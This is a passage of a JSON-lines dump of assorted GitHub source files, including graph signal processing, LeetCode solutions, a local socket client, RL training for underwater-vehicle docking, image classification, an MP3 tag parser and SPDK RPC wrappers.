computeGFT(self,x,k=None):\n xt=np.conj(self.V.T) @ x\n if k==None:\n return xt\n else:\n xtk = np.zeros_like(xt)\n xtk[np.argsort(np.abs(xt[:, 0]))[-k:], 0] = xt[np.argsort(np.abs(xt[:, 0]))[-k:], 0]\n return xtk\n\n def computeiGFT(self,xt, k=None):\n if k==None:\n return self.V@xt\n else:\n return self.V[:,np.argsort(np.abs(xt[:,0]))[-k:]]@xt[np.argsort(np.abs(xt[:,0]))[-k:],0]\n\n def computeTotalVariation(self,x):\n #x.T转置\n return x.T@(self.S)@x\n","repo_name":"litong1103/xiaobai","sub_path":"graph_fourier_transform.py","file_name":"graph_fourier_transform.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74626244116","text":"\"\"\"\nWe are given two sentences A and B. (A sentence is a string of space separated words. Each word consists only of lowercase letters.)\n\nA word is uncommon if it appears exactly once in one of the sentences, and does not appear in the other sentence.\n\nReturn a list of all uncommon words.\n\nYou may return the list in any order.\n\n\n\nExample 1:\n\nInput: A = \"this apple is sweet\", B = \"this apple is sour\"\nOutput: [\"sweet\",\"sour\"]\nExample 2:\n\nInput: A = \"apple apple\", B = \"banana\"\nOutput: [\"banana\"]\n\n\nNote:\n\n0 <= A.length <= 200\n0 <= B.length <= 200\nA and B both contain only spaces and lowercase letters.\n\"\"\"\n\nfrom collections import Counter\n\n\nclass Solution:\n def uncommonFromSentences(self, A, B):\n \"\"\"\n :type A: str\n :type B: str\n :rtype: List[str]\n \"\"\"\n\n \"\"\"\n Method 1:\n\n * Find the words that occur only once in both the lists\n * Convert those unique words into a set and find the\n difference between the sets, both ways A-B & B-A\n * Combine the results\n\n 53 / 53 test cases passed.\n Status: Accepted\n Runtime: 36 ms\n \"\"\"\n\n set_A = set()\n set_B = set()\n\n # #Find the words that occur only once in both the lists\n counter_A = Counter(A.split())\n counter_B = Counter(B.split())\n\n # #Convert those unique words into a sets\n for k, v in counter_A.items():\n if v == 1 and k not in counter_B.keys():\n set_A.add(k)\n\n for k, v in counter_B.items():\n if v == 1 and k not in counter_A.keys():\n set_B.add(k)\n\n # #Combine the sets to form the result\n return list(set_A - set_B) + list(set_B - set_A)","repo_name":"KartikKannapur/Algorithms","sub_path":"00_Code/01_LeetCode/888_UncommonWordsfromTwoSentences.py","file_name":"888_UncommonWordsfromTwoSentences.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} 
+{"seq_id":"8679284617","text":"# client.py\n\nimport socket # Import socket module\n\n\nserver_connection = socket.socket() # Create a socket object\nhost = socket.gethostname() # Get local machine name\nport = 12345 # Reserve a port for your service.\nbuffer_size_in_bits = 1024\n\nprint(\"Conectando-se ao servidor\")\nserver_connection.connect((host, port))\nprint(\"Conectado\")\n\nwhile True:\n message = input(\"Digite uma mensagem: \") + \"\\n\"\n server_connection.sendall(message.encode())\n if message == \"SAIR\\n\":\n break\n\n \n print(f\"Mensagem enviada\")\n print(\"Esperando resposta\")\n message_in_bytes = server_connection.recv(buffer_size_in_bits)\n if not message_in_bytes:\n break\n \n message_string = message_in_bytes.decode().split(\"\\n\")[0]\n\n print(f\"Resposta recebida :{message_string}\")\n\nserver_connection.close()\nprint(\"Desconectando.\")\n","repo_name":"samuel-cavalcanti/ping_pong_sistemas_distruibuidos_ufu","sub_path":"ping_pong/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"73545661399","text":"import os\nimport logging\n\nimport numpy as np\n\nimport gym\nfrom matplotlib import pyplot as plt\nfrom stable_baselines3 import A2C, PPO, DDPG, SAC\nfrom stable_baselines3.common import base_class\nfrom stable_baselines3.common.noise import NormalActionNoise\n\nfrom gym_dockauv.utils.datastorage import EpisodeDataStorage, FullDataStorage\nfrom gym_dockauv.config.DRL_hyperparams import PPO_HYPER_PARAMS_DEFAULT\nfrom gym_dockauv.config.env_config import PREDICT_CONFIG, MANUAL_CONFIG, TRAIN_CONFIG, REGISTRATION_DICT\nfrom gym_dockauv.envs.docking3d import BaseDocking3d\n\n# Set logger\nlogger = logging.getLogger(__name__)\n\n\ndef train(gym_env: str,\n total_timesteps: int,\n MODEL: base_class = PPO,\n model_save_path: str = \"logs/PPO_docking\",\n agent_hyper_params: dict = PPO_HYPER_PARAMS_DEFAULT,\n env_config: dict = TRAIN_CONFIG,\n tb_log_name: str = \"PPO\",\n timesteps_per_save: int = None,\n model_load_path: str = None) -> None:\n f\"\"\"\n Function to train and save model, own wrapper\n \n Model name that will be saved is \"[model_save_path]_[elapsed_timesteps]\", when timesteps_per_save is given model \n is captured and saved in between \n \n .. 
note:: Interval of saving and number of total runtime might be inaccurate, if the StableBaseLine agent n_steps \n is not accordingly updated, for example total runtime is 3000 steps, however, update per n_steps of the agent is \n by default for PPO at 2048, thus the agents only checks if its own simulation time steps is bigger than 3000 \n after every multiple of 2048 \n\n :param MODEL: DRL algorithm model to use\n :param gym_env: Registration string of gym from docking3d\n :param total_timesteps: total timesteps for this training run\n :param model_save_path: path where to save the model\n :param agent_hyper_params: agent hyper parameter, default is always loaded\n :param env_config: environment configuration\n :param tb_log_name: log file name of this run for tensor board\n :param timesteps_per_save: simulation timesteps before saving the model in that interval\n :param model_load_path: path of existing model, use to continue training with that model\n :return: None\n \"\"\"\n # Create environment\n env = make_gym(gym_env=gym_env, env_config=env_config) # type: BaseDocking3d\n # Init variables\n elapsed_timesteps = 0\n sim_timesteps = timesteps_per_save if timesteps_per_save else total_timesteps\n\n # # For DDPG algorithm\n # n_actions = env.action_space.shape[0]\n # action_noise = NormalActionNoise(mean=np.zeros(n_actions), sigma=0.1 * np.ones(n_actions))\n\n # Instantiate the agent\n if model_load_path is None:\n model = MODEL(policy='MlpPolicy', env=env, **agent_hyper_params)\n else:\n # Note that this does not load a replay buffer\n model = MODEL.load(model_load_path, env=env)\n\n while elapsed_timesteps < total_timesteps:\n # Train the agent\n model.learn(total_timesteps=sim_timesteps, reset_num_timesteps=False, tb_log_name=tb_log_name)\n # Taking the actual elapsed timesteps here, so the total simulation time at least will not be biased\n elapsed_timesteps = model.num_timesteps\n # Save the agent\n tmp_model_save_path = f\"{model_save_path}_{elapsed_timesteps}\"\n # This DOES NOT save the replay/rollout buffer, that is why we continue using the same model instead of\n # reloading anything in the while loop\n model.save(tmp_model_save_path)\n logger.info(f'Successfully saved model: {os.path.join(os.path.join(os.getcwd(), tmp_model_save_path))}')\n\n env.save_full_data_storage()\n return None\n\n\n# TODO\ndef predict(gym_env: str, model_path: str, MODEL: base_class = PPO, n_episodes: int = 5, render: bool = True):\n \"\"\"\n Function to visualize and evaluate the actual model on the environment\n\n :param gym_env: Registration string of gym from docking3d\n :param model_path: full path of trained agent\n :param MODEL: stable baseline model\n :param n_episodes: number of episodes to run\n :param render: boolean for render\n :return:\n \"\"\"\n env = make_gym(gym_env=gym_env, env_config=PREDICT_CONFIG) # type: BaseDocking3d\n # Load the trained agent\n # NOTE: if you have loading issue, you can pass `print_system_info=True`\n # to compare the system on which the model was trained vs the current one\n\n n_actions = env.action_space.shape[0]\n #action_noise = NormalActionNoise(mean=np.zeros(n_actions), sigma=0.1 * np.ones(n_actions))\n model = MODEL.load(model_path, env=env)\n\n # Enjoy trained agent\n obs = env.reset(seed=2)\n for i in range(n_episodes):\n done = False\n while not done:\n action, _states = model.predict(obs, deterministic=True)\n obs, rewards, done, info = env.step(action)\n if render:\n env.render(rotate_cam=True)\n if done:\n break\n env.reset()\n 
env.save_full_data_storage()\n\n\ndef post_analysis_directory(directory: str = \"/home/erikx3/PycharmProjects/gym_dockauv/logs\", show_full: bool = True,\n show_episode: bool = True):\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n # Capture full data pkl file\n full_path = os.path.join(directory, filename)\n if filename.endswith(\"FULL_DATA_STORAGE.pkl\") and show_full:\n full_stor = FullDataStorage()\n full_stor.load(full_path)\n full_stor.plot_rewards()\n plt.show()\n # Episode Data Storage:\n elif filename.endswith(\".pkl\") and show_episode:\n epi_stor = EpisodeDataStorage()\n epi_stor.load(full_path)\n epi_stor.plot_epsiode_states()\n epi_stor.plot_u()\n epi_stor.plot_observation()\n epi_stor.plot_rewards()\n plt.show()\n # epi_stor.plot_episode_animation(t_per_step=None, title=\"Test Post Flight Visualization\")\n\n\ndef manual_control(gym_env: str):\n \"\"\"\n Function with pygame workaround to manually fly and debug the vehicle\n\n Great for debugging purposes, since post analysis can be called on the log that is created\n\n :param gym_env: Registration string of gym from docking3d env\n \"\"\"\n import pygame\n\n # Settings:\n WINDOW_X = 600\n WINDOW_Y = 400\n # Init environment\n env = make_gym(gym_env=gym_env, env_config=MANUAL_CONFIG) # type: BaseDocking3d\n env.reset()\n done = False\n # Init pygame\n pygame.init()\n window = pygame.display.set_mode((WINDOW_X, WINDOW_Y))\n run = True\n # Init pygame text I want to use\n pygame.font.init()\n my_font = pygame.font.SysFont('Comic Sans MS', 30)\n text_title = my_font.render('Click on this window to control vehicle', False, (255, 255, 255))\n text_note = my_font.render('Note: Not real time! Press keys below.', False, (255, 255, 255))\n text_instructions1 = [\n my_font.render('Input 1 / Linear x:', False, (255, 255, 255)),\n my_font.render('Input 2 / Linear y:', False, (255, 255, 255)),\n my_font.render('Input 3 / Linear z:', False, (255, 255, 255)),\n my_font.render('Input 4 / Angular x:', False, (255, 255, 255)),\n my_font.render('Input 5 / Angular y:', False, (255, 255, 255)),\n my_font.render('Input 6 / Angular z:', False, (255, 255, 255))]\n text_instructions2 = [my_font.render('w', False, (255, 255, 255)),\n my_font.render('a', False, (255, 255, 255)),\n my_font.render('f', False, (255, 255, 255)),\n my_font.render('u', False, (255, 255, 255)),\n my_font.render('h', False, (255, 255, 255)),\n my_font.render('o', False, (255, 255, 255))]\n text_instructions3 = [my_font.render('s', False, (255, 255, 255)),\n my_font.render('d', False, (255, 255, 255)),\n my_font.render('r', False, (255, 255, 255)),\n my_font.render('j', False, (255, 255, 255)),\n my_font.render('k', False, (255, 255, 255)),\n my_font.render('l', False, (255, 255, 255))]\n # Init valid action\n action = np.zeros(6)\n valid_input_no = env.auv.u_bound.shape[0]\n while run:\n # --------- Pygame ----------\n # Text and shapes on pygame window\n window.fill((0, 0, 0)) # Make black background again\n window.blit(text_title, (0, 0))\n window.blit(text_note, (0, 30))\n pos_y = 80\n count = 0\n for text1, text2, text3 in zip(text_instructions1, text_instructions2, text_instructions3):\n window.blit(text1, (0, pos_y))\n window.blit(text2, (250, pos_y))\n window.blit(text3, (WINDOW_X - 50, pos_y))\n # Here we draw the circle based on which keyboard are pressed\n circle_x = WINDOW_X - 100 - (WINDOW_X - 100 - 300) / 2 * (action[count] + 1)\n pygame.draw.circle(window, 'green', (circle_x, pos_y + 10), 5)\n pos_y += 45\n count += 1\n # Draw a green line\n 
line_x = (250 + WINDOW_X - 50) / 2\n pygame.draw.line(window, 'green', (line_x, 80), (line_x, 80 + 5 * 45 + 30))\n # Update pygame window\n pygame.display.update()\n pygame.display.flip()\n\n # --------- Derive action from keyboard input ---------\n action = np.zeros(6)\n keys = pygame.key.get_pressed()\n action[0] = (keys[pygame.K_w] - keys[pygame.K_s]) * 1\n action[1] = (keys[pygame.K_a] - keys[pygame.K_d]) * 1\n action[2] = (keys[pygame.K_f] - keys[pygame.K_r]) * 1\n action[3] = (keys[pygame.K_u] - keys[pygame.K_j]) * 1\n action[4] = (keys[pygame.K_h] - keys[pygame.K_k]) * 1\n action[5] = (keys[pygame.K_o] - keys[pygame.K_l]) * 1\n\n # Get valid action, as number of inputs might be smaller than 6 for other vehicles\n valid_action = action[:valid_input_no]\n\n # Need this part below to make everything work, but also quitting\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q or event.type == pygame.QUIT:\n run = False\n\n # --------- Environment ---------\n if not done:\n # Env related stuff\n obs, rewards, done, info = env.step(valid_action)\n env.render()\n # This last call ensures, that we save a log for \"episode one\"\n else:\n env.reset()\n done = False\n # Call in case of quit\n env.reset()\n\n\ndef make_gym(gym_env: str, env_config: dict) -> BaseDocking3d:\n \"\"\"\n Wrapper to create and return gym and return error if key is wrong\n\n :param gym_env: Registration string of gym from docking3d env\n :param env_config: Config for environment\n :return:\n \"\"\"\n if gym_env in REGISTRATION_DICT:\n env = gym.make(gym_env, env_config=env_config)\n return env\n else:\n raise KeyError(f\"Not valid gym environment registration string,\"\n f\" available options are {REGISTRATION_DICT.keys()}\")\n","repo_name":"Erikx3/gym_dockauv","sub_path":"gym_dockauv/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11231,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"85"} +{"seq_id":"2807248555","text":"import numpy as np\nfrom keras.preprocessing import image\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nfrom keras.regularizers import l2\n\n# dimensions of our images.\nimg_width, img_height = 32,24\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\n# Define the model architecture\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64, kernel_regularizer=l2(0.01)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nnum_classes = 4 # Change this to the number of classes\nmodel.add(Dense(num_classes))\nmodel.add(Activation('softmax'))\n\n# Load the model\nmodel.load_weights('scale_down_weights_v3.h5')\n\nimg_path = 'thermal_image_41.jpg'\nimg = image.load_img(img_path, target_size=(img_width, img_height))\n\n# Convert the image to a numpy array\nx = image.img_to_array(img)\nx = np.expand_dims(x, axis=0)\n\nclass_labels = {'Cold': 0, 'Hot': 1, 'Neutral': 2, 'Very Hot': 3}\n\n# Predict the class of the image\ndef 
classify_image(image_path):\n    img = image.load_img(image_path, target_size=(img_width, img_height))\n    x = image.img_to_array(img)\n    x = np.expand_dims(x, axis=0)\n    images = np.vstack([x])\n    proba = model.predict(images, batch_size=10)\n    for i, class_label in enumerate(class_labels.keys()):\n        print(f\"Probability of {class_label}: {proba[0][i]}\")\n    classes = np.argmax(proba, axis=-1)\n    class_label = list(class_labels.keys())[list(class_labels.values()).index(classes[0])]\n    return class_label\n\nprint(classify_image(img_path))","repo_name":"tanmayrainanda/ILGC-3-Project","sub_path":"scaled_down_testing.py","file_name":"scaled_down_testing.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"42332214889","text":"import numpy as np\nfrom typing import List\n\n\nclass SelectionOperator:\n    def roulette_wheel(\n        fitness_scores: List[float],\n        n: int,\n        replace: bool = False,\n        epsilon: float = 0.01,\n    ) -> List[int]:\n        # When fitness is zero, the probability distribution may only allow\n        # selection of fewer individuals than required when replace = False.\n        # To solve this, we add a small epsilon. We choose 0.01 to be small\n        # enough (0.5% relative to max score of 2).\n\n        perturbed_fitness = np.array(fitness_scores) + epsilon\n        norm_fitness_scores = perturbed_fitness / sum(perturbed_fitness)\n        return np.random.choice(\n            len(fitness_scores), n, p=norm_fitness_scores, replace=replace\n        )\n\n    def tournament(\n        fitness_scores: List[float], n: int, k: int = 3, replace: bool = False\n    ) -> List[int]:\n        ranked_indices = np.argsort(fitness_scores)\n        population = len(ranked_indices)\n        parents = []\n\n        for _ in range(n):\n            # Must choose k different individuals\n            chosen = max(\n                np.random.choice(population, min(k, population), replace=False)\n            )\n            parents.append(ranked_indices[chosen])\n\n            if not replace:\n                # np.delete returns a new array; reassign so the chosen index is actually removed\n                ranked_indices = np.delete(ranked_indices, chosen)\n                population -= 1\n\n        return parents\n","repo_name":"matsagad/beng-project","sub_path":"evolution/genetic/operators/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"9741630156","text":"import tensorflow as tf\nimport numpy as np\n\nfrom noise import dropout\n\n\nclass DropOutTest(tf.test.TestCase):\n\n    def setUp(self):\n        self.layer = dropout.Dropout()\n\n    def testEqualityAcrossChannels(self):\n        \"\"\" Test that samples across channels are identical \"\"\"\n\n        # Test simple binary case\n        input_image = tf.ones((1, 12, 12, 3))\n        background_image = tf.zeros((1, 12, 12, 3))\n        res = self.layer((input_image, background_image))\n        channels = tf.split(res, res.shape[-1], axis=-1)\n\n        with self.cached_session(use_gpu=False):\n            self.assertAllEqual(channels[0], channels[1])\n            self.assertAllEqual(channels[1], channels[2])\n\n    def testMutabilityOnDifferentCalls(self):\n        \"\"\" Confirm that different invocations of the layer\n            lead to different samplings\n        \"\"\"\n        input_image = tf.ones((1, 1000, 1000, 1))\n        background_image = tf.zeros((1, 1000, 1000, 1))\n        res1 = self.layer((input_image, background_image), 0.5)\n        res2 = self.layer((input_image, background_image), 0.5)\n\n        with self.cached_session(use_gpu=False):\n            self.assertNotAllEqual(res1, res2)\n\n    def testMultipleSamplingProportions(self):\n\n        with self.cached_session(use_gpu=False):\n\n            input_image = tf.ones((1, 1000, 1000, 1))\n            background_image = tf.zeros((1, 1000, 1000, 1))\n\n            
keep_probs = [0, 0.1, 0.5, 0.9, 1.0]\n\n for keep_prob in keep_probs:\n res = self.layer((input_image, background_image), keep_prob)\n total_shape = np.prod(res.shape)\n actual = tf.reduce_sum(res) / total_shape\n actual = actual.numpy()\n expected = 1.0 * keep_prob\n self.assertAlmostEqual(actual, expected, places=2)\n\nif __name__ == '__main__':\n tf.test.main(argv=None)\n","repo_name":"marco-willi/HiDDeN-tensorflow","sub_path":"tests/test_noise_dropout.py","file_name":"test_noise_dropout.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12233726770","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport time\ndef loadData():\n '''\n dataset = np.array([[1,1],[2,2],[2,0],\n [0,0],[1,0],[0,1]])\n tagset = np.array([1, 1, 1, -1, -1, -1])\n '''\n dataset = np.loadtxt(\"TrainSamples.csv\", dtype=np.float, delimiter=\",\")\n tagset = np.loadtxt(\"TrainLabels.csv\", dtype=np.float, delimiter=\",\")\n return dataset, tagset\n\ndef lmse(dataset,tagset):\n num, dim = np.shape(dataset)\n b = np.ones((num,1))* 1\n eta = 0.000001\n data_tag = dataset.copy()\n for i in range(num):\n data_tag[i] = tagset[i] * data_tag[i]\n tagset.reshape((num,1))\n data_tag = np.column_stack((tagset,data_tag))\n # print data_tag\n a = np.ones(((dim+1),1)) / (dim+1)\n if (np.linalg.det(np.dot(data_tag.T, data_tag)) < 0.01):\n a = np.dot(np.dot(np.linalg.inv(np.dot(data_tag.T, data_tag) + 0.01*np.eye((dim+1))), data_tag.T), b)\n else:\n a = np.dot(np.dot(np.linalg.inv(np.dot(data_tag.T, data_tag)), data_tag.T),b)\n # print a\n return a / a[0]\n\ndef showPlt(dataset, tagset, w):\n num = np.shape(dataset)[0]\n marker = ['or', 'ob', 'og', 'ok', '^r', '+r', 'sr', 'dr', ' 0:\n print(f\"Your score is {score}\")\n first = random.randint(0, 49)\n first_data = game_data.data[first]\n print(\"A:\" + first_data[\"name\"] + \",\" + first_data[\"description\"] + \",\" + first_data[\"country\"])\n second = random.randint(0, 49)\n second_data = game_data.data[second]\n print(\"B:\" + second_data[\"name\"] + \",\" + second_data[\"description\"] + \",\" + second_data[\"country\"])\n answer = input(\"Who has more followers?'A' 'or' 'B'\").lower()\n if answer == \"a\":\n if first_data[\"follower_count\"] > second_data[\"follower_count\"]:\n right = True\n score += 1\n else:\n right = False\n elif answer == \"b\":\n if first_data[\"follower_count\"] < second_data[\"follower_count\"]:\n right = True\n score += 1\n else:\n right = False\n\nprint(f\"You lost,Your final score is {score}\")\n","repo_name":"AlphaSpirit1/100-Days-of-Code","sub_path":"Day 13/Day_13.py","file_name":"Day_13.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21052222041","text":"#jonathan Kelly, 10/14/19,Jonathan.kelly2@marist.edu, create stop light using functions\n\nfrom graphics import *\n\nwin = GraphWin('traffic_light',200,200)\n\n\ndef draw_lamp(x,y,radius,color):\n light=Circle (Point (x,y), radius)\n light.setFill(color)\n light.setOutline (\"black\")\n \n light.draw(win)\n \ndef draw_light_body(x, y, length, width):\n rect= Rectangle (Point(x,y), Point(length,width))\n rect.setOutline(\"black\")\n rect.setFill(\"white\")\n \n rect.draw(win)\n \n\ndef draw_traffic_light(x,y):\n draw_light_body(x, y, 100, 160)\n draw_lamp(65, 40, 20, \"red\")\n draw_lamp(65, 85, 20, \"yellow\")\n draw_lamp(65, 130, 20, \"green\")\n \n win.getMouse()\n 
\ndef main():\n \n draw_traffic_light(30, 10)\n\nmain()","repo_name":"Marist-CMPT120-FA19/Jonathan-Kelly-Project6","sub_path":"Lab6.py","file_name":"Lab6.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"39322446408","text":"import time\nfrom get_list import pop_item, get_list, my_url, MOH_url\nimport logging\nfrom django.conf import settings\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom django.core.management.base import BaseCommand\nfrom django_apscheduler.jobstores import DjangoJobStore\nfrom django_apscheduler.models import DjangoJobExecution\nfrom django_apscheduler import util\n\nlogger = logging.getLogger(__name__)\n\n\ndef my_job():\n current_response = get_list(my_url, \"\", \"\")\n new_response = get_list(MOH_url, \"\", \"\") \n for i in new_response:\n if \"Auckland\" in i[1]:\n if i not in current_response: \n i.insert(0, 1)\n i.append(int(time.time()))\n i = tuple(i)\n pop_item(i)\n\n\n# The `close_old_connections` decorator ensures that database connections, that have become\n# unusable or are obsolete, are closed before and after job has run.\n@util.close_old_connections\ndef delete_old_job_executions(max_age=604_800):\n \"\"\"\n This job deletes APScheduler job execution entries older than `max_age` from the database.\n It helps to prevent the database from filling up with old historical records that are no\n longer useful.\n \n :param max_age: The maximum length of time to retain historical job execution records.\n Defaults to 7 days.\n \"\"\"\n DjangoJobExecution.objects.delete_old_job_executions(max_age)\n\n\nclass Command(BaseCommand):\n help = \"Runs APScheduler.\"\n\n def handle(self, *args, **options):\n scheduler = BlockingScheduler(timezone=settings.TIME_ZONE)\n scheduler.add_jobstore(DjangoJobStore(), \"default\")\n\n scheduler.add_job(\n my_job,\n trigger=CronTrigger(minute=\"*/10\"),\n id=\"my_job\", # The `id` assigned to each job MUST be unique\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\"Added job 'my_job'.\") \n\n\n try:\n logger.info(\"Starting scheduler...\")\n scheduler.start()\n except KeyboardInterrupt:\n logger.info(\"Stopping scheduler...\")\n scheduler.shutdown()\n logger.info(\"Scheduler shut down successfully!\")","repo_name":"regrimwood/auckland-CovidLOI-project","sub_path":"main/management/commands/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32355733767","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\nfrom flask import current_app, request, url_for\nfrom flask_mongoengine import MongoEngine\nfrom tradezero_pricer import db\n\n\nclass Stock(db.Document):\n #_id = db.IntegerField(required=True, primary_key=True)\n ticker = db.StringField(required=True, max_length=5, unique=True)\n name = db.StringField(required=True, max_length=40)\n price = db.FloatField(required=True, default=0.0)\n price_y = db.FloatField(required=True, default=0.0)\n volume = db.FloatField(required=True, default=0.0)\n marketcap = db.FloatField(required=True, default=0.0)\n candle_data = db.ListField(required=True, default=lambda: {})\n last_update = db.DateTimeField(required=True, default=date.today())\n\n def to_json(self):\n return {\"ticker\": self.ticker,\n \"name\": self.name,\n \"volume\": self.volume,\n \"marketcap\": 
self.marketcap,\n                \"price\": self.price,\n                \"price_y\": self.price_y,\n                \"last_update\": self.last_update}\n\n    def get_intraday(self):\n        change = (self.price_y - self.price) / self.price_y if self.price_y else 0.00\n        return {\"ticker\": self.ticker,\n                \"variation\": change}\n\n    def is_active(self):\n        return True\n\n    def get_ticker(self):\n        return str(self.ticker)\n\n\ndef stock_factory(ticker: str, name: str, price: float, price_y: float,\n                  volume: float, marketcap: float, candle_data: list,\n                  last_update: date) -> Stock:\n    '''\n    Stock factory method\n    '''\n    if ticker in current_app.config['TICKER_WATCHLIST']:\n        current_app.logger.debug(f'{ticker} is in the watchlist. Instantiating.')\n        return Stock(ticker=ticker, name=name, price=price, price_y=price_y,\n                     volume=volume, marketcap=marketcap, candle_data=candle_data,\n                     last_update=last_update)\n    else:\n        current_app.logger.error(f\" {ticker} not in the watchlist. Ignoring.\")\n        return None\n\n\n","repo_name":"mauroseb/tradezero-pricer","sub_path":"tradezero_pricer/domain/models/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28210890392","text":"import re\nmessageList = [\n    'ขอรายงานครับ',\n    'เริ่มต้นการรายงานครับ',\n    'ขอแจ้งข่าวครับ'\n]\n\nSTART_REPORT_PATTERN = 'รายงาน|แจ้งข่าว'\nfor message in messageList:\n    m = re.search(START_REPORT_PATTERN,message)\n    # print(m)\n    print(m.group(0))","repo_name":"mootuun/line-bot-report-assistant","sub_path":"test/regex/re01.py","file_name":"re01.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"th","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"41956211883","text":"import os\nfrom deejayd.library.parsers.audio.core import _AudioFile\n\nextensions = [\".mp3\", \".mp2\", \".aac\"]\ntry:\n    from mutagen.mp3 import MP3\nexcept ImportError:\n    extensions = []\n\n\nclass Mp3File(_AudioFile):\n    IDS = {\n        \"TIT2\": \"title\",\n        \"TPE1\": \"artist\",\n        \"TALB\": \"album\",\n    }\n\n    def parse(self, file, library):\n        self.__infos = _AudioFile.parse(self, file, library)\n        mp3_info = MP3(file)\n\n        self.__infos.update([\n            (\"title\", \"\"),\n            (\"artist\", \"\"),\n            (\"album\", \"\"),\n            (\"tracknumber\", \"\"),\n            (\"discnumber\", \"\"),\n            (\"date\", \"\"),\n            (\"genre\", \"\"),\n            (\"replaygain_track_gain\", \"\"),\n            (\"replaygain_track_peak\", \"\"),\n            (\"replaygain_album_gain\", \"\"),\n            (\"replaygain_album_peak\", \"\"),\n            (\"length\", int(mp3_info.info.length)),\n        ])\n\n        tag = mp3_info.tags\n        if not tag:\n            self.__infos[\"title\"] = os.path.split(file)[1]\n            return self.__infos\n\n        for frame in list(tag.values()):\n            if frame.FrameID == \"RVA2\": # replaygain\n                self.__process_rg(frame)\n                continue\n            elif frame.FrameID == \"TCON\": # genre\n                self.__infos[\"genre\"] = frame.genres[0]\n                continue\n            elif frame.FrameID == \"TDRC\": # date\n                d_list = [stamp.text for stamp in frame.text]\n                self.__infos[\"date\"] = d_list[0]\n                continue\n            elif frame.FrameID == \"TRCK\": # tracknumber\n                self.__infos[\"tracknumber\"] = self._format_number(frame.text[0])\n            elif frame.FrameID == \"TPOS\": # discnumber\n                self.__infos[\"discnumber\"] = self._format_number(frame.text[0])\n            elif frame.FrameID in list(self.IDS.keys()):\n                self.__infos[self.IDS[frame.FrameID]] = frame.text[0]\n            elif frame.FrameID == \"APIC\": # picture\n                if frame.type == 3: # album front cover\n                    self.__infos[\"cover\"] = {\n                        \"data\": frame.data,\n                        \"mimetype\": frame.mime\n                    }\n                else:\n                    
continue\n\n return self.__infos\n\n def __process_rg(self, frame):\n if frame.channel == 1 and frame.desc in (\"track\", \"album\"):\n self.__infos[\"replaygain_%s_gain\" % frame.desc] = \"%+f dB\" % frame.gain\n self.__infos[\"replaygain_%s_peak\" % frame.desc] = str(frame.peak)\n\n\nobject = Mp3File\n","repo_name":"niol/deejayd","sub_path":"deejayd/library/parsers/audio/mp3.py","file_name":"mp3.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"37042154854","text":"def vfu_tgt_set_base_path(client, path):\n \"\"\"Set socket base path.\n\n Args:\n path: base path\n \"\"\"\n params = {\n 'path': path\n }\n\n return client.call('vfu_tgt_set_base_path', params)\n\n\ndef vfu_virtio_delete_endpoint(client, name):\n \"\"\"Delete specified endpoint name.\n\n Args:\n name: endpoint name\n \"\"\"\n params = {\n 'name': name\n }\n\n return client.call('vfu_virtio_delete_endpoint', params)\n\n\ndef vfu_virtio_create_blk_endpoint(client, name, bdev_name, cpumask, num_queues, qsize, packed_ring):\n \"\"\"Create virtio-blk endpoint.\n\n Args:\n name: endpoint name\n bdev_name: name of block device\n cpumask: CPU core mask\n num_queues: number of vrings\n qsize: number of element of each vring\n packed_ring: enable packed ring\n \"\"\"\n params = {\n 'name': name,\n 'bdev_name': bdev_name\n }\n if cpumask:\n params['cpumask'] = cpumask\n if num_queues:\n 